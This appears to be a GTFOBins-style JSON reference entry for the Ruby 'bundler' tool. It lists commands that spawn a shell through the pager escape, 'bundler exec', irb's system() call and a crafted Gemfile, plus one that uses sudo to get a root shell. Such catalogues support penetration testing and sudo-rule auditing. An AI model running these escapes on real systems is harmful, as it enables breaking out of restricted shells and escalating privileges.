You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

29 lines
922 B
JSON

{
"functions": {
"shell": [
{
"description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
"code": "bundler help\n!/bin/sh\n"
},
{
"code": "export BUNDLE_GEMFILE=x\nbundler exec /bin/sh\n"
},
{
"code": "TF=$(mktemp -d)\ntouch $TF/Gemfile\ncd $TF\nbundler exec /bin/sh\n"
},
{
"description": "This spawns an interactive shell via 'irb'.",
"code": "TF=$(mktemp -d)\ntouch $TF/Gemfile\ncd $TF\nbundler console\nsystem('/bin/sh -c /bin/sh')\n"
},
{
"code": "TF=$(mktemp -d)\necho 'system(\"/bin/sh\")' > $TF/Gemfile\ncd $TF\nbundler install\n"
}
],
"sudo": [
{
"description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
"code": "sudo bundler help\n!/bin/sh\n"
}
]
}
}